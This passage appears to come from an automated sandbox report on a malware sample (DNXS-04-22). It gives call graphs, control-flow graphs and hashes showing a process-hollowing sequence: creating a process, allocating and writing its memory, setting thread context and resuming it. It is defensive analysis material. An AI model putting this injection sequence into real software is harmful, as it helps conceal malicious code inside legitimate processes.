58086->58087 58087->58083 58156 75be0b5 58157 75be0ca 58156->58157 58158 75be164 58156->58158 58163 75be8d8 58157->58163 58187 75be986 58157->58187 58212 75be8d2 58157->58212 58159 75be2ea 58164 75be8f2 58163->58164 58179 75be8fa 58164->58179 58236 75bf1b5 58164->58236 58241 75bef76 58164->58241 58247 75bf117 58164->58247 58252 75bf237 58164->58252 58258 75bef90 58164->58258 58263 75bedd3 58164->58263 58273 75bf373 58164->58273 58278 75bed5e 58164->58278 58287 75bf178 58164->58287 58294 75bf019 58164->58294 58299 75befba 58164->58299 58304 75bf2fb 58164->58304 58309 75befa6 58164->58309 58314 75bee67 58164->58314 58320 75bef20 58164->58320 58328 75bee01 58164->58328 58337 75beec3 58164->58337 58342 75bef03 58164->58342 58347 75bf3ef 58164->58347 58352 75bee8b 58164->58352 58357 75bf12b 58164->58357 58179->58159 58188 75be914 58187->58188 58190 75be989 58187->58190 58189 75be8fa 58188->58189 58191 75bf2fb 2 API calls 58188->58191 58192 75befba 2 API calls 58188->58192 58193 75bf019 2 API calls 58188->58193 58194 75bf178 2 API calls 58188->58194 58195 75bed5e 4 API calls 58188->58195 58196 75bf373 2 API calls 58188->58196 58197 75bedd3 4 API calls 58188->58197 58198 75bef90 2 API calls 58188->58198 58199 75bf237 2 API calls 58188->58199 58200 75bf117 2 API calls 58188->58200 58201 75bef76 2 API calls 58188->58201 58202 75bf1b5 2 API calls 58188->58202 58203 75bf12b 2 API calls 58188->58203 58204 75bee8b 2 API calls 58188->58204 58205 75bf3ef 2 API calls 58188->58205 58206 75bef03 2 API calls 58188->58206 58207 75beec3 2 API calls 58188->58207 58208 75bee01 4 API calls 58188->58208 58209 75bef20 4 API calls 58188->58209 58210 75bee67 2 API calls 58188->58210 58211 75befa6 2 API calls 58188->58211 58189->58159 58191->58189 58192->58189 58193->58189 58194->58189 58195->58189 58196->58189 58197->58189 58198->58189 58199->58189 58200->58189 58201->58189 58202->58189 58203->58189 58204->58189 58205->58189 58206->58189 58207->58189 58208->58189 58209->58189 58210->58189 58211->58189 58213 75be8d9 58212->58213 58214 75bf2fb 2 API calls 58213->58214 58215 75befba 2 API calls 58213->58215 58216 75bf019 2 API calls 58213->58216 58217 75bf178 2 API calls 58213->58217 58218 75bed5e 4 API calls 58213->58218 58219 75bf373 2 API calls 58213->58219 58220 75bedd3 4 API calls 58213->58220 58221 75bef90 2 API calls 58213->58221 58222 75bf237 2 API calls 58213->58222 58223 75bf117 2 API calls 58213->58223 58224 75bef76 2 API calls 58213->58224 58225 75bf1b5 2 API calls 58213->58225 58226 75bf12b 2 API calls 58213->58226 58227 75bee8b 2 API calls 58213->58227 58228 75be8fa 58213->58228 58229 75bf3ef 2 API calls 58213->58229 58230 75bef03 2 API calls 58213->58230 58231 75beec3 2 API calls 58213->58231 58232 75bee01 4 API calls 58213->58232 58233 75bef20 4 API calls 58213->58233 58234 75bee67 2 API calls 58213->58234 58235 75befa6 2 API calls 58213->58235 58214->58228 58215->58228 58216->58228 58217->58228 58218->58228 58219->58228 58220->58228 58221->58228 58222->58228 58223->58228 58224->58228 58225->58228 58226->58228 58227->58228 58228->58159 58229->58228 58230->58228 58231->58228 58232->58228 58233->58228 58234->58228 58235->58228 58237 75bee8b 58236->58237 58367 75bd8d0 58237->58367 58371 75bd8c9 58237->58371 58238 75bf4a6 58243 75bee73 58241->58243 58242 75bf683 58243->58241 58244 75bee85 58243->58244 58375 75bd7d8 58243->58375 58379 75bd7e0 58243->58379 58244->58179 58248 75bf124 58247->58248 58383 75bd598 58248->58383 58387 75bd590 58248->58387 58249 75bf544 58249->58179 58249->58249 58254 75bee73 58252->58254 58253 75bee85 58253->58179 58254->58253 58256 75bd7d8 WriteProcessMemory 58254->58256 58257 75bd7e0 WriteProcessMemory 58254->58257 58255 75bf683 58256->58255 58257->58255 58259 75bf1ce 58258->58259 58261 75bd7d8 WriteProcessMemory 58259->58261 58262 75bd7e0 WriteProcessMemory 58259->58262 58260 75bf465 58261->58260 58262->58260 58264 75bed66 58263->58264 58265 75bf8a4 58264->58265 58266 75bee48 58264->58266 58391 75bda5d 58264->58391 58395 75bda68 58264->58395 58267 75bee85 58266->58267 58269 75bd7d8 WriteProcessMemory 58266->58269 58270 75bd7e0 WriteProcessMemory 58266->58270 58267->58179 58268 75bf683 58269->58268 58270->58268 58274 75bf37b 58273->58274 58399 75bd648 58274->58399 58403 75bd640 58274->58403 58275 75bf396 58279 75bed68 58278->58279 58281 75bee48 58279->58281 58285 75bda68 CreateProcessA 58279->58285 58286 75bda5d CreateProcessA 58279->58286 58280 75bee85 58280->58179 58281->58280 58283 75bd7d8 WriteProcessMemory 58281->58283 58284 75bd7e0 WriteProcessMemory 58281->58284 58282 75bf683 58283->58282 58284->58282 58285->58281 58286->58281 58288 75bee73 58287->58288 58289 75bf3e0 58288->58289 58290 75bee85 58288->58290 58292 75bd7d8 WriteProcessMemory 58288->58292 58293 75bd7e0 WriteProcessMemory 58288->58293 58289->58179 58290->58179 58291 75bf683 58292->58291 58293->58291 58295 75bf01d 58294->58295 58407 75bd718 58295->58407 58411 75bd720 58295->58411 58296 75bf7a6 58300 75befc7 58299->58300 58302 75bd718 VirtualAllocEx 58300->58302 58303 75bd720 VirtualAllocEx 58300->58303 58301 75bf7a6 58302->58301 58303->58301 58305 75bf301 58304->58305 58307 75bd7d8 WriteProcessMemory 58305->58307 58308 75bd7e0 WriteProcessMemory 58305->58308 58306 75bf683 58307->58306 58308->58306 58310 75beea3 58309->58310 58312 75bd8c9 ReadProcessMemory 58310->58312 58313 75bd8d0 ReadProcessMemory 58310->58313 58311 75bf4a6 58312->58311 58313->58311 58316 75bee73 58314->58316 58315 75bee85 58315->58179 58316->58315 58318 75bd7d8 WriteProcessMemory 58316->58318 58319 75bd7e0 WriteProcessMemory 58316->58319 58317 75bf683 58318->58317 58319->58317 58324 75bd648 Wow64SetThreadContext 58320->58324 58325 75bd640 Wow64SetThreadContext 58320->58325 58321 75beeda 58322 75bf27f 58321->58322 58326 75bd598 ResumeThread 58321->58326 58327 75bd590 ResumeThread 58321->58327 58322->58179 58323 75bf544 58323->58179 58323->58323 58324->58321 58325->58321 58326->58323 58327->58323 58329 75bee0e 58328->58329 58333 75bda68 CreateProcessA 58329->58333 58334 75bda5d CreateProcessA 58329->58334 58330 75bee85 58330->58179 58331 75bee48 58331->58330 58335 75bd7d8 WriteProcessMemory 58331->58335 58336 75bd7e0 WriteProcessMemory 58331->58336 58332 75bf683 58333->58331 58334->58331 58335->58332 58336->58332 58338 75beec9 58337->58338 58340 75bd598 ResumeThread 58338->58340 58341 75bd590 ResumeThread 58338->58341 58339 75bf544 58339->58179 58339->58339 58340->58339 58341->58339 58343 75beea3 58342->58343 58345 75bd8c9 ReadProcessMemory 58343->58345 58346 75bd8d0 ReadProcessMemory 58343->58346 58344 75bf4a6 58345->58344 58346->58344 58348 75bf37b 58347->58348 58350 75bd648 Wow64SetThreadContext 58348->58350 58351 75bd640 Wow64SetThreadContext 58348->58351 58349 75bf396 58350->58349 58351->58349 58353 75bee91 58352->58353 58355 75bd8c9 ReadProcessMemory 58353->58355 58356 75bd8d0 ReadProcessMemory 58353->58356 58354 75bf4a6 58355->58354 58356->58354 58363 75bd7d8 WriteProcessMemory 58357->58363 58364 75bd7e0 WriteProcessMemory 58357->58364 58358 75bf5ce 58358->58179 58359 75bf080 58359->58357 58359->58358 58361 75bee73 58359->58361 58360 75bee85 58360->58179 58361->58360 58365 75bd7d8 WriteProcessMemory 58361->58365 58366 75bd7e0 WriteProcessMemory 58361->58366 58362 75bf683 58363->58359 58364->58359 58365->58362 58366->58362 58368 75bd91b ReadProcessMemory 58367->58368 58370 75bd95f 58368->58370 58370->58238 58372 75bd8d0 ReadProcessMemory 58371->58372 58374 75bd95f 58372->58374 58374->58238 58376 75bd7e0 WriteProcessMemory 58375->58376 58378 75bd87f 58376->58378 58378->58242 58380 75bd828 WriteProcessMemory 58379->58380 58382 75bd87f 58380->58382 58382->58242 58384 75bd5d8 ResumeThread 58383->58384 58386 75bd609 58384->58386 58386->58249 58388 75bd598 ResumeThread 58387->58388 58390 75bd609 58388->58390 58390->58249 58392 75bdaf1 58391->58392 58392->58392 58393 75bdc56 CreateProcessA 58392->58393 58394 75bdcb3 58393->58394 58396 75bdaf1 58395->58396 58396->58396 58397 75bdc56 CreateProcessA 58396->58397 58398 75bdcb3 58397->58398 58400 75bd68d Wow64SetThreadContext 58399->58400 58402 75bd6d5 58400->58402 58402->58275 58404 75bd648 Wow64SetThreadContext 58403->58404 58406 75bd6d5 58404->58406 58406->58275 58408 75bd720 VirtualAllocEx 58407->58408 58410 75bd79d 58408->58410 58410->58296 58412 75bd760 VirtualAllocEx 58411->58412 58414 75bd79d 58412->58414 58414->58296

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1094 5e586b0-5e586eb 1095 5e586f2-5e58893 call 5e58140 1094->1095 1096 5e586ed 1094->1096 1117 5e5889d-5e588a9 call 5e58150 1095->1117 1096->1095 1119 5e588ae-5e588f7 call 5e58150 1117->1119 1125 5e58901-5e5890d call 5e58160 1119->1125 1127 5e58912-5e58929 1125->1127 1129 5e58933-5e5893f call 5e58170 1127->1129 1131 5e58944-5e58acf call 5e58170 * 3 call 5e58150 call 5e58160 call 5e58150 1129->1131 1160 5e58ada-5e58aed 1131->1160 1634 5e58af0 call 7f3b3c0 1160->1634 1635 5e58af0 call 7f3b3b0 1160->1635 1636 5e58af0 call 7f3b488 1160->1636 1161 5e58af3-5e58b69 call 5e58180 1166 5e58b6e-5e58b83 call 5e58190 1161->1166 1168 5e58b88-5e58c88 call 5e581a0 call 5e581b0 call 5e581c0 1166->1168 1179 5e58c8d-5e58c9b 1168->1179 1180 5e58ca1-5e59094 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e581c0 call 5e58180 call 5e58190 call 5e581a0 1179->1180 1222 5e59168-5e59181 1180->1222 1223 5e59187-5e591b4 call 5e581b0 1222->1223 1224 5e59099-5e590ab 1222->1224 1228 5e591b9-5e591ca call 5e581d0 1223->1228 1226 5e590b4-5e590c0 1224->1226 1229 5e590c9-5e590cf 1226->1229 1231 5e591cf-5e591f6 call 5e581e0 call 5e581f0 1228->1231 1637 5e590d5 call 7f3f089 1229->1637 1638 5e590d5 call 7f3f098 1229->1638 1242 5e591fb-5e59225 call 5e58200 call 5e58210 1231->1242 1232 5e590db-5e590ed 1234 5e590f4-5e59113 1232->1234 1235 5e590ef 1232->1235 1236 5e59115 1234->1236 1237 5e5911a-5e5912e 1234->1237 1235->1234 1236->1237 1239 5e59135-5e59156 1237->1239 1240 5e59130 1237->1240 1243 5e5915d-5e59165 1239->1243 1244 5e59158 1239->1244 1240->1239 1248 5e5922a-5e5929b call 5e58220 1242->1248 1243->1222 1244->1243 1253 5e592a6-5e592bd 1248->1253 1254 5e592c5-5e593c1 call 5e581c0 1253->1254 1265 5e593c9-5e593f7 call 5e58230 call 5e58240 1254->1265 1269 5e593fc-5e594c9 call 5e581c0 1265->1269 1278 5e594d1-5e594f1 1269->1278 1280 5e594f7-5e59507 1278->1280 1281 5e5950e-5e5952e 1280->1281 1282 5e59509 1280->1282 1284 5e59535-5e59589 1281->1284 1285 5e59530 1281->1285 1282->1281 1288 5e59590-5e595a9 1284->1288 1289 5e5958b 1284->1289 1285->1284 1291 5e595b0-5e595cf 1288->1291 1292 5e595ab 1288->1292 1289->1288 1294 5e595d9-5e595f1 1291->1294 1292->1291 1295 5e595f8-5e5ad33 call 5e58250 call 5e58260 call 5e58180 call 5e58270 call 5e58190 call 5e58280 call 5e581c0 call 5e58290 call 5e582b0 call 5e582c0 call 5e581a0 call 5e581b0 call 5e582d0 call 5e582e0 call 5e581c0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e582f0 call 5e58300 call 5e58310 call 5e582e0 call 5e581c0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e582f0 call 5e58300 call 5e58310 call 5e582e0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e582f0 call 5e58310 call 5e582e0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e582f0 call 5e58310 call 5e581c0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e581d0 call 5e581e0 call 5e581f0 call 5e58200 call 5e58210 call 5e58320 call 5e58220 call 5e581c0 call 5e58230 call 5e58240 call 5e581c0 call 5e58250 call 5e58260 call 5e58180 call 5e58270 call 5e58190 call 5e58280 call 5e581c0 call 5e58290 call 5e582b0 call 5e582c0 call 5e581a0 call 5e581b0 call 5e581c0 call 5e58180 call 5e58190 call 5e581a0 call 5e581b0 call 5e58330 call 5e58340 1294->1295 1578 5e5ad35-5e5ad41 1295->1578 1579 5e5ad5d 1295->1579 1580 5e5ad43-5e5ad49 1578->1580 1581 5e5ad4b-5e5ad51 1578->1581 1582 5e5ad63-5e5b042 call 5e58350 call 5e58360 * 11 call 5e58370 call 5e58380 call 5e58190 call 5e58390 1579->1582 1583 5e5ad5b 1580->1583 1581->1583 1583->1582 1634->1161 1635->1161 1636->1161 1637->1232 1638->1232
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: ef26cff8cb573759e41b1123c65c66a22f4217993a843c0440fce9493dae260b
                                                                • Instruction ID: f14dbca502ada34e307b4b19584265130f6c0537433d2b5ec9d8b493eab01332
                                                                • Opcode Fuzzy Hash: ef26cff8cb573759e41b1123c65c66a22f4217993a843c0440fce9493dae260b
                                                                • Instruction Fuzzy Hash: A143C634A01618CFCB65DF24DC98AAAB7B2FF89311F1151E9E5096B361DB31AE85CF40
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: t
                                                                • API String ID: 0-4213291413
                                                                • Opcode ID: 5df2bcc8785315612674a37ddb6976e811f5fb4ef80e8ee76fdb611a19642c31
                                                                • Instruction ID: a10a3c79f8a55c8c116fbd47cbfb3e06124878b1c4ea60069892f7a36afb2553
                                                                • Opcode Fuzzy Hash: 5df2bcc8785315612674a37ddb6976e811f5fb4ef80e8ee76fdb611a19642c31
                                                                • Instruction Fuzzy Hash: D141F5B5E016099FDB18DFAAD5406EEFBF2FF88300F14C12AE408A7355DB3499428B90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 818b021e319d9bf5c37550e6dff2d8b101128d97b88d968c0beaa64d5f7e22ef
                                                                • Instruction ID: 0e93d86446eb0b0329d7fd5a36e22cee742198930333463797d89d71f45b72ba
                                                                • Opcode Fuzzy Hash: 818b021e319d9bf5c37550e6dff2d8b101128d97b88d968c0beaa64d5f7e22ef
                                                                • Instruction Fuzzy Hash: 26527D74A0035ACFDB14DF28C844B99B7B2FF85314F2582A9D5586F3A1DB71A982CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367871134.0000000007F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7f30000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 72a8281e0653c96ac2b7642953949f6c3c307f9c52768169f755bc51d8f091cd
                                                                • Instruction ID: c33acf09d8dbdc6beae56c4f624beeff11a2bcb6b009b14f07634ac579409bdb
                                                                • Opcode Fuzzy Hash: 72a8281e0653c96ac2b7642953949f6c3c307f9c52768169f755bc51d8f091cd
                                                                • Instruction Fuzzy Hash: 80527B74A0035ACFDB10DF28C844B98B7B2FF85314F2582A9D5586F3A1DB71A986CF81
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1639 75bda5d-75bdafd 1641 75bdaff-75bdb09 1639->1641 1642 75bdb36-75bdb56 1639->1642 1641->1642 1643 75bdb0b-75bdb0d 1641->1643 1649 75bdb58-75bdb62 1642->1649 1650 75bdb8f-75bdbbe 1642->1650 1644 75bdb0f-75bdb19 1643->1644 1645 75bdb30-75bdb33 1643->1645 1647 75bdb1b 1644->1647 1648 75bdb1d-75bdb2c 1644->1648 1645->1642 1647->1648 1648->1648 1651 75bdb2e 1648->1651 1649->1650 1652 75bdb64-75bdb66 1649->1652 1656 75bdbc0-75bdbca 1650->1656 1657 75bdbf7-75bdcb1 CreateProcessA 1650->1657 1651->1645 1654 75bdb89-75bdb8c 1652->1654 1655 75bdb68-75bdb72 1652->1655 1654->1650 1658 75bdb76-75bdb85 1655->1658 1659 75bdb74 1655->1659 1656->1657 1661 75bdbcc-75bdbce 1656->1661 1670 75bdcba-75bdd40 1657->1670 1671 75bdcb3-75bdcb9 1657->1671 1658->1658 1660 75bdb87 1658->1660 1659->1658 1660->1654 1662 75bdbf1-75bdbf4 1661->1662 1663 75bdbd0-75bdbda 1661->1663 1662->1657 1665 75bdbde-75bdbed 1663->1665 1666 75bdbdc 1663->1666 1665->1665 1668 75bdbef 1665->1668 1666->1665 1668->1662 1681 75bdd42-75bdd46 1670->1681 1682 75bdd50-75bdd54 1670->1682 1671->1670 1681->1682 1683 75bdd48 1681->1683 1684 75bdd56-75bdd5a 1682->1684 1685 75bdd64-75bdd68 1682->1685 1683->1682 1684->1685 1686 75bdd5c 1684->1686 1687 75bdd6a-75bdd6e 1685->1687 1688 75bdd78-75bdd7c 1685->1688 1686->1685 1687->1688 1689 75bdd70 1687->1689 1690 75bdd8e-75bdd95 1688->1690 1691 75bdd7e-75bdd84 1688->1691 1689->1688 1692 75bddac 1690->1692 1693 75bdd97-75bdda6 1690->1693 1691->1690 1695 75bddad 1692->1695 1693->1692 1695->1695
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075BDC9E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 9631a2a2ec204bdfcfe065861f17c06f77f2c470aae8fb131244bbecda682010
                                                                • Instruction ID: d627e403929d5c31288cba70b4aac7aee2527682abdae2b7afc0a09528f31863
                                                                • Opcode Fuzzy Hash: 9631a2a2ec204bdfcfe065861f17c06f77f2c470aae8fb131244bbecda682010
                                                                • Instruction Fuzzy Hash: B6A17FB1E0071ADFEB24DF68C8417EDBBB2BF44310F1485AAD848A7250DB759985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1696 75bda68-75bdafd 1698 75bdaff-75bdb09 1696->1698 1699 75bdb36-75bdb56 1696->1699 1698->1699 1700 75bdb0b-75bdb0d 1698->1700 1706 75bdb58-75bdb62 1699->1706 1707 75bdb8f-75bdbbe 1699->1707 1701 75bdb0f-75bdb19 1700->1701 1702 75bdb30-75bdb33 1700->1702 1704 75bdb1b 1701->1704 1705 75bdb1d-75bdb2c 1701->1705 1702->1699 1704->1705 1705->1705 1708 75bdb2e 1705->1708 1706->1707 1709 75bdb64-75bdb66 1706->1709 1713 75bdbc0-75bdbca 1707->1713 1714 75bdbf7-75bdcb1 CreateProcessA 1707->1714 1708->1702 1711 75bdb89-75bdb8c 1709->1711 1712 75bdb68-75bdb72 1709->1712 1711->1707 1715 75bdb76-75bdb85 1712->1715 1716 75bdb74 1712->1716 1713->1714 1718 75bdbcc-75bdbce 1713->1718 1727 75bdcba-75bdd40 1714->1727 1728 75bdcb3-75bdcb9 1714->1728 1715->1715 1717 75bdb87 1715->1717 1716->1715 1717->1711 1719 75bdbf1-75bdbf4 1718->1719 1720 75bdbd0-75bdbda 1718->1720 1719->1714 1722 75bdbde-75bdbed 1720->1722 1723 75bdbdc 1720->1723 1722->1722 1725 75bdbef 1722->1725 1723->1722 1725->1719 1738 75bdd42-75bdd46 1727->1738 1739 75bdd50-75bdd54 1727->1739 1728->1727 1738->1739 1740 75bdd48 1738->1740 1741 75bdd56-75bdd5a 1739->1741 1742 75bdd64-75bdd68 1739->1742 1740->1739 1741->1742 1743 75bdd5c 1741->1743 1744 75bdd6a-75bdd6e 1742->1744 1745 75bdd78-75bdd7c 1742->1745 1743->1742 1744->1745 1746 75bdd70 1744->1746 1747 75bdd8e-75bdd95 1745->1747 1748 75bdd7e-75bdd84 1745->1748 1746->1745 1749 75bddac 1747->1749 1750 75bdd97-75bdda6 1747->1750 1748->1747 1752 75bddad 1749->1752 1750->1749 1752->1752
                                                                APIs
                                                                • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075BDC9E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1367032226.00000000075B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_75b0000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateProcess
                                                                • String ID:
                                                                • API String ID: 963392458-0
                                                                • Opcode ID: 2c9d6f7283275f3133705510eee2a28f6a657f8a365c0de0d243d95a05c27c53
                                                                • Instruction ID: 58ae61f490178a131b635b09aa9be04d383db1e0da1e8e20afb09845722ae79b
                                                                • Opcode Fuzzy Hash: 2c9d6f7283275f3133705510eee2a28f6a657f8a365c0de0d243d95a05c27c53
                                                                • Instruction Fuzzy Hash: A9914DB1E0071ADFDB24DF68C8417EDBBB2BF44310F1485AAD848A7290DB759985CF91
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1753 2c5b148-2c5b157 1754 2c5b183-2c5b187 1753->1754 1755 2c5b159-2c5b166 call 2c59bb8 1753->1755 1757 2c5b189-2c5b193 1754->1757 1758 2c5b19b-2c5b1dc 1754->1758 1761 2c5b17c 1755->1761 1762 2c5b168 1755->1762 1757->1758 1764 2c5b1de-2c5b1e6 1758->1764 1765 2c5b1e9-2c5b1f7 1758->1765 1761->1754 1808 2c5b16e call 2c5b3d1 1762->1808 1809 2c5b16e call 2c5b3e0 1762->1809 1764->1765 1766 2c5b1f9-2c5b1fe 1765->1766 1767 2c5b21b-2c5b21d 1765->1767 1769 2c5b200-2c5b207 call 2c5ae00 1766->1769 1770 2c5b209 1766->1770 1772 2c5b220-2c5b227 1767->1772 1768 2c5b174-2c5b176 1768->1761 1771 2c5b2b8-2c5b378 1768->1771 1774 2c5b20b-2c5b219 1769->1774 1770->1774 1803 2c5b380-2c5b3ab GetModuleHandleW 1771->1803 1804 2c5b37a-2c5b37d 1771->1804 1775 2c5b234-2c5b23b 1772->1775 1776 2c5b229-2c5b231 1772->1776 1774->1772 1779 2c5b23d-2c5b245 1775->1779 1780 2c5b248-2c5b251 call 2c5ae10 1775->1780 1776->1775 1779->1780 1784 2c5b253-2c5b25b 1780->1784 1785 2c5b25e-2c5b263 1780->1785 1784->1785 1786 2c5b265-2c5b26c 1785->1786 1787 2c5b281-2c5b28e 1785->1787 1786->1787 1789 2c5b26e-2c5b27e call 2c5ae20 call 2c5ae30 1786->1789 1794 2c5b2b1-2c5b2b7 1787->1794 1795 2c5b290-2c5b2ae 1787->1795 1789->1787 1795->1794 1805 2c5b3b4-2c5b3c8 1803->1805 1806 2c5b3ad-2c5b3b3 1803->1806 1804->1803 1806->1805 1808->1768 1809->1768
                                                                APIs
                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 02C5B39E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1359349038.0000000002C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2c50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: 6b736a86732c3fa3cde4f2c2149230729ffbfbb114b6e5d482a1eccaaf91b0b8
                                                                • Instruction ID: a671e7c971fbff0dabe373e2b1bcc8723c1641c17eb3a9381a021d17838d14e0
                                                                • Opcode Fuzzy Hash: 6b736a86732c3fa3cde4f2c2149230729ffbfbb114b6e5d482a1eccaaf91b0b8
                                                                • Instruction Fuzzy Hash: 53715770A00B158FD724DF6AD44475ABBF2FF88304F008A2DD88AD7A54DB74E985CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1810 5e51c90-5e51ca4 1811 5e51ca6-5e51ccd 1810->1811 1812 5e51cde-5e51d56 1810->1812 1813 5e51cd5-5e51cd6 1811->1813 1814 5e51cd0 call 5e51110 1811->1814 1815 5e51d61-5e51d68 1812->1815 1816 5e51d58-5e51d5e 1812->1816 1814->1813 1817 5e51d73-5e51e12 CreateWindowExW 1815->1817 1818 5e51d6a-5e51d70 1815->1818 1816->1815 1820 5e51e14-5e51e1a 1817->1820 1821 5e51e1b-5e51e53 1817->1821 1818->1817 1820->1821 1825 5e51e55-5e51e58 1821->1825 1826 5e51e60 1821->1826 1825->1826 1827 5e51e61 1826->1827 1827->1827
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E51E02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 5ddc694ea5f5d8f8c94c461844a9e8d9499e4f08ee17f03db400de98c2f53604
                                                                • Instruction ID: 7251a01f72b7e4083eec7a62e86d00d6a5e1e699a623fb64114e666ca7a02eb9
                                                                • Opcode Fuzzy Hash: 5ddc694ea5f5d8f8c94c461844a9e8d9499e4f08ee17f03db400de98c2f53604
                                                                • Instruction Fuzzy Hash: CD51FEB2C00349AFDF16CFA9C984ADDBFB6BF48314F15816AE848AB220D7719855CF50
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1828 5e51110-5e51d56 1830 5e51d61-5e51d68 1828->1830 1831 5e51d58-5e51d5e 1828->1831 1832 5e51d73-5e51e12 CreateWindowExW 1830->1832 1833 5e51d6a-5e51d70 1830->1833 1831->1830 1835 5e51e14-5e51e1a 1832->1835 1836 5e51e1b-5e51e53 1832->1836 1833->1832 1835->1836 1840 5e51e55-5e51e58 1836->1840 1841 5e51e60 1836->1841 1840->1841 1842 5e51e61 1841->1842 1842->1842
                                                                APIs
                                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05E51E02
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1365170666.0000000005E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E50000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_5e50000_DNXS-04-22.jbxd
                                                                Similarity
                                                                • API ID: CreateWindow
                                                                • String ID:
                                                                • API String ID: 716092398-0
                                                                • Opcode ID: 672d758c8765646c2e9802b26cac3fd0d76e1b1c023672b45a5638fc9e193ea6
                                                                • Instruction ID: d21f8c75f24c2029aae7615766d67bd80a83a7379444034b6b8554e843a210b9
                                                                • Opcode Fuzzy Hash: 672d758c8765646c2e9802b26cac3fd0d76e1b1c023672b45a5638fc9e193ea6
                                                                • Instruction Fuzzy Hash: 7751B1B1D00349DFDB14CF99C884ADEBBB6FF48310F64812AE859AB250DB759845CF90
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
